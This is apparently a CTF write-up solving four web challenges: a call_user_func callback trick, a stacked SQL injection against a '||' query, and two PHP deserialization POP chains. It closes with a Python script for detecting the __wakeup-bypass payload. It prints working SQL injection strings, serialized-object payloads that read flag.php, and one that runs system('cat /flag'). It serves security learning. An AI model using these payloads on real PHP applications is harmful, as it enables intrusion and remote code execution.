[SWPUCTF 2022 Freshman Contest] numgame

When the number is raised to 18 it automatically drops back to -20.

A small obstacle is in place: Ctrl+U does not show the page source, so view-source has to be used manually.

Some useful information turns up in the JS: first, the JS reads the input box and returns -20 when it reaches 18; further down there is a base64 string that decodes to NsScTf.php, so try visiting it.

It gives a hint: the request method similar to GET is POST; it includes hint2.php; below that, the incoming parameter p is filtered with a blacklist of the two letters n and c; and further down there is an important function, call_user_func.

ctf is a static class, so the callback can be written with the double-colon (::) operator.

That is, something like call_user_func(class::function). In this challenge the callback is the p value sent via GET, so writing p=Class::method in the GET request is enough.

Look at the hint in hint2.

The source shows only one class, so first try it via GET.

payload:url?p=Nss2::Ctf

The flag is returned.

The first hint mentions POST; in that case p is passed as an array, p[]=nss2&p[]=ctf, which also yields the flag.

[suctf 2019]EasySQL

Stacked injection: several statements stacked into one query, separated by ;.

Opening the challenge reveals an injection box; use stacked statements. // or, order, union, as well as error-based, time-based and boolean injection, all get nonono

1;show databases#


Testing also shows that when the input starts with 0, whatever follows produces no output, which suggests the backend uses an OR operation.

First list the tables.

1;show tables;#

The table is named Flag; trying to read its columns produces an error.

The backend statement is: select $_POST['query'] || flag from Flag

If the input is *,1 the statement becomes

select *,1||flag from Flag, and because OR short-circuits (1||flag is always 1) it is effectively

select *,1 from Flag, i.e. select all columns from Flag and append one extra column whose value is always 1.

payload:*,1

Another payload

1;set sql_mode=PIPES_AS_CONCAT;select 1

This makes || be treated as concat, so 1 and flag are concatenated together.

[GDOUCTF 2023] 反方向的钟 (Clock in Reverse)

<?php
error_reporting(0);
highlight_file(__FILE__);
// flag.php
class teacher{
public $name;
public $rank;
private $salary;
public function __construct($name,$rank,$salary = 10000){
$this->name = $name;
$this->rank = $rank;
$this->salary = $salary;
}
}

class classroom{
public $name;
public $leader;
public function __construct($name,$leader){
$this->name = $name;
$this->leader = $leader;
}
public function hahaha(){
if($this->name != 'one class' or $this->leader->name != 'ing' or $this->leader->rank !='department'){
return False;
}
else{
return True;
}
}
}

class school{
public $department;
public $headmaster;
public function __construct($department,$ceo){
$this->department = $department;
$this->headmaster = $ceo;
}
public function IPO(){
if($this->headmaster == 'ong'){
echo "Pretty Good ! Ctfer!\n";
echo new $_POST['a']($_POST['b']);
}
}
public function __wakeup(){
if($this->department->hahaha()) {
$this->IPO();
}
}
}

if(isset($_GET['d'])){
unserialize(base64_decode($_GET['d']));
}
?>

IPO is the final step. To reach IPO from __wakeup, $this->department->hahaha() must be true; hahaha lives in the classroom class, and of its three conditions, rank and name belong to the teacher class.

The exploitation order is the school class, then the classroom class, then the teacher class, and the result must be base64-encoded at the end.

<?php
error_reporting(0);
highlight_file(__FILE__);
// flag.php
// Only the property values checked by __wakeup() and hahaha() are needed; methods are not serialized.
class teacher{
public $name='ing';
public $rank='department';

}


class classroom{
public $name="one class";
public $leader;
}

class school{
public $department;
public $headmaster = "ong";
}
$a = new school();
$a->department=new classroom();        // school::__wakeup() calls $this->department->hahaha()
$a->department->leader=new teacher();  // leader name/rank satisfy hahaha()
echo base64_encode(serialize($a));     // the challenge base64-decodes the d parameter
?>

Pass the result as the d parameter via GET. The IPO method contains new $_POST['a']($_POST['b']), so the built-in SplFileObject class combined with the php://filter wrapper can be used to read a file.

payload

url:

http://node5.anna.nssctf.cn:27912/?d=Tzo2OiJzY2hvb2wiOjI6e3M6MTA6ImRlcGFydG1lbnQiO086OToiY2xhc3Nyb29tIjoyOntzOjQ6Im5hbWUiO3M6OToib25lIGNsYXNzIjtzOjY6ImxlYWRlciI7Tzo3OiJ0ZWFjaGVyIjoyOntzOjQ6Im5hbWUiO3M6MzoiaW5nIjtzOjQ6InJhbmsiO3M6MTA6ImRlcGFydG1lbnQiO319czoxMDoiaGVhZG1hc3RlciI7czozOiJvbmciO30=

post:

a=SplFileObject&b=php://filter/read=convert.base64-encode/resource=flag.php

Then just base64-decode the output.

[SWPUCTF 2022 Freshman Contest] ez_1zpop

<?php
error_reporting(0);
class dxg
{
function fmm()
{
return "nonono";
}
}

class lt
{
public $impo='hi';
public $md51='weclome';
public $md52='to NSS';
function __construct()
{
$this->impo = new dxg;
}
function __wakeup()
{
$this->impo = new dxg;
return $this->impo->fmm();
}

function __toString()
{
if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52)
return $this->impo->fmm();
}
function __destruct()
{
echo $this;
}
}

class fin
{
public $a;
public $url = 'https://www.ctfer.vip';
public $title;
function fmm()
{
$b = $this->a;
$b($this->title);
}
}

if (isset($_GET['NSS'])) {
$Data = unserialize($_GET['NSS']);
} else {
highlight_file(__file__);
}

The dxg class is useless; to avoid ending up in dxg, __wakeup has to be bypassed.

__toString contains an md5 check to bypass; to execute fmm, set impo = new fin().

The fin class is used for RCE (command execution).

<?php
error_reporting(0);

class lt
{
public $impo='hi';
public $md51='s155964671a';  // md5() of both strings starts with "0e", so == compares them as 0 == 0
public $md52='s214587387a';  // while the strings themselves differ, satisfying md51 != md52

}

class fin
{
public $a="system";            // callable invoked in fin::fmm() as $b($this->title)
public $url="https://www.ctfer.vip";
public $title = "cat /flag";   // argument passed to that callable
}
$a = new lt();
$b = new fin();
$a->impo=$b;                   // lt::__toString() calls $this->impo->fmm()
echo serialize($a);
?>
//O:2:"lt":3:{s:4:"impo";O:3:"fin":3:{s:1:"a";s:6:"system";s:3:"url";s:21:"https://www.ctfer.vip";s:5:"title";s:9:"cat /flag";}s:4:"md51";s:11:"s155964671a";s:4:"md52";s:11:"s214587387a";}

To bypass __wakeup, make the member count in the serialized string larger than the actual number of members.

payload:

?NSS=O:2:"lt":4:{s:4:"impo";O:3:"fin":3:{s:1:"a";s:6:"system";s:3:"url";s:21:"https://www.ctfer.vip";s:5:"title";s:9:"cat /flag";}s:4:"md51";s:11:"s155964671a";s:4:"md52";s:11:"s214587387a";}
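As an added example (not part of the original writeup), the Python script below parses PHP serialize() output and reports the signature of the __wakeup bypass used above: an object whose declared property count is larger than the number of properties actually present. A defender can run it over request parameters from logs to spot such payloads. The names PhpObject, parse and audit are assumptions; the two payload strings are the ones from this writeup.

```python
from collections import namedtuple

# cls = class name, declared = property count written in the payload, props = properties present
PhpObject = namedtuple("PhpObject", "cls declared props")

def parse(s, i=0):
    """Parse one PHP-serialized value at s[i] (i, s and O types); return (value, next_index)."""
    t = s[i]
    if t == "i":                                    # i:5;
        end = s.index(";", i)
        return int(s[i + 2:end]), end + 1
    colon = s.index(":", i + 2)                     # s and O both start t:<number>:
    n = int(s[i + 2:colon])
    if t == "s":                                    # s:4:"impo";  length-prefixed, so ';' or '"' inside are safe
        start = colon + 2                           # skip :"
        return s[start:start + n], start + n + 2    # skip ";
    if t == "O":                                    # O:2:"lt":4:{key;value;...}
        cls = s[colon + 2:colon + 2 + n]
        j = colon + 2 + n + 2                       # past the closing quote and ':'
        colon2 = s.index(":", j)
        declared, j, props = int(s[j:colon2]), colon2 + 2, {}
        # Stop at '}' even when fewer properties than declared are present: that is the
        # __wakeup-bypass trick from the writeup, and the scanner must not crash on it.
        while len(props) < declared and s[j] != "}":
            k, j = parse(s, j)
            v, j = parse(s, j)
            props[k] = v
        return PhpObject(cls, declared, props), j + 1
    raise ValueError(f"unsupported type {t!r} at offset {i}")

def audit(value, path="$"):
    """Return one finding per object whose declared property count differs from what is present."""
    findings = []
    if isinstance(value, PhpObject):
        if value.declared != len(value.props):
            findings.append(f"{path}: class {value.cls} declares {value.declared} "
                            f"properties but carries {len(value.props)}")
        for k, v in value.props.items():
            findings += audit(v, f"{path}.{k}")
    return findings

# Payloads from the writeup: the plain chain and the bypass variant (":4:" while only 3 properties follow).
NORMAL = 'O:2:"lt":3:{s:4:"impo";O:3:"fin":3:{s:1:"a";s:6:"system";s:3:"url";s:21:"https://www.ctfer.vip";s:5:"title";s:9:"cat /flag";}s:4:"md51";s:11:"s155964671a";s:4:"md52";s:11:"s214587387a";}'
BYPASS = NORMAL.replace('"lt":3:', '"lt":4:', 1)
```

Running audit(parse(BYPASS)[0]) yields a single finding for class lt, while the plain chain yields none; the parser also recovers the nested fin object so the callable and argument can be inspected.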